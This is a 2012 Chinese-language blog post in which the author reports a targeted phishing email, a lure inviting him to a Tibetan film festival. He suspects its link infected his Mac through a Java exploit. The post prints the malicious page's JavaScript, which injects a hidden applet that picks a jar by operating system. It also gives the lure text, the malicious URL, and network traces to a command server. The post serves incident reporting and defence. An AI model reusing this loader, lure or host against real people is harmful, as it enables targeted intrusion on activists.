2012年3月29日星期四

利用Java的恶意邮件Fwd: Invitation for Tibetan Films

我尝试打开这个邮件中提到的网址,结果浏览闪一下什么都没有,我用CURL一查看,结果显示以下内容,疑似针对苹果电脑的java病毒, 求高手解读


我收到一封邮件提到记录片,因为我正好有纪录片即将上映,所以打开了邮件中提到网址,尝试safari打开这个邮件中提到的网址,结果浏览闪一下什么都没有,我用CURL一查看,结果显示以下内容,疑似针对苹果电脑的java插件 病毒, 求高手解读
发现运行了一个java插件,查到file.tmp进程信息看到这个:192.168.10.101:50575->138.114.158.98.client.dyn.strong-in55.reliablehosting.com:8099

现在访问  http://sftpune.serveblog.net/ 仍然会在电脑的 %TEPM%\下生成file.tmp,file.tmp 上传到virustotal.com显示在最近几天被报告为木马和后门 ,有朋友提示这是利用java的 CVE-2011-3544 漏洞。


mymac:~ zola$ lsof -P -i -n  | grep -v "*" | awk '{printf "%s %s %s\n",$1,$8,$9}' | sed "1d;$d" | more
Finder TCP 127.0.0.1:49184->127.0.0.1:26164
Dropbox TCP 192.168.10.101:51731->75.126.110.108:443
Dropbox TCP 192.168.10.101:49186->199.47.219.147:80
Dropbox TCP 127.0.0.1:26164
Dropbox TCP 127.0.0.1:26164->127.0.0.1:49184
Dropbox TCP 192.168.10.101:49183->199.47.218.160:443
file.tmp TCP 192.168.10.101:52931->98.158.114.158:8099

尝试查 98.158.114.158,结果好这IP不存活,tracert 不到
Lookup 已启动…

Trying "158.114.158.98.in-addr.arpa"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26975
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;158.114.158.98.in-addr.arpa. IN PTR

;; ANSWER SECTION:
158.114.158.98.in-addr.arpa. 85358 IN PTR 158.114.158.98.client.dyn.strong-in55.reliablehosting.com.

Received 116 bytes from 8.8.8.8#53 in 41 ms



有人说我被人用java漏洞 CVE-2011-3544搞了


update:20120414

苹果放出 Java for OS X Lion 2012-003 更新,可去除最常见的几种 Flashback 木马,并将浏览器的 Java 插件设为不自动执行 Java 小程序。
http://support.apple.com/kb/HT5242?viewlocale=en_US&locale=en_US


img.jar和ref.jar已经下载保存到
高和宽为1的窗口,还判断用户是不是MAC电脑,这设计很先进嘛。邮件中又是讨论西藏独立的于中国政府敏感的话题,此邮件显然是针对活跃人士进行攻击。我现在还不知道这病毒对我造成了什么样的伤害。故求高手解读代码。
邮件源文件保存在 http://file.zuo.la/virusmail/2012MAR/20120330.txt

我尝试打开这个邮件中提到的网址,结果浏览闪一下什么都没有,我用CURL一查看,结果显示以下内容,疑似针对苹果电脑的java病毒, 求高手解读
<html>
<body>
<script>
    var emb = document.createElement('applet');
    emb.setAttribute('name', 'applet');
    emb.setAttribute('width', '1');
    emb.setAttribute('height', '1');

    if (navigator.userAgent.indexOf('Win') != -1){
        emb.setAttribute('code', 'Func1.class');
        emb.setAttribute('archive', 'img.jar');
    }
    else if (navigator.userAgent.indexOf('Mac') != -1){
        emb.setAttribute('code', 'a.class');
        emb.setAttribute('archive', 'ref.jar')
    }
    document.body.appendChild(emb);

</script>
</body>
</html>mymac:~ zola$ 



---------- 已转发邮件 ----------
发件人: SFT Pune <[email protected]>
日期: 2012年3月28日 上午11:09
主题: Invitation for Tibetan Films
收件人: [email protected]



We cordially invite you to the festival of Tibetan films "FLIM 2012" which is organized by the Students for A Free Tibet Pune. The main part of the festival will be held at symbiosis auditorium, SP ROAD, April 13–15, 2012.
This year's festival presents 20 Tibetan documentary and dramatic feature films, as well as films about Tibet. After the evening screenings discussions with special guests will follow. All films are screened in English. More information about films presented at the festival can be found at http://sftpune.serveblog.net/
Students for A Free Tibet Pune is part of the SFT,International founded in 1994 for the fight to restore Tibet's Independence and drive out the Chinese from Tibet Mission : Students for a Free Tibet (SFT) works in solidarity with the Tibetan people in their struggle for freedom and independence. We are a chapter-based network of young people and activists around the world.





1 条评论:

  1. 苹果放出 Java for OS X Lion 2012-003 更新,可去除最常见的几种 Flashback 木马,并将浏览器的 Java 插件设为不自动执行 Java 小程序。

    http://support.apple.com/kb/HT5242?viewlocale=en_US&locale=en_US

    回复删除

周曙光的网络日志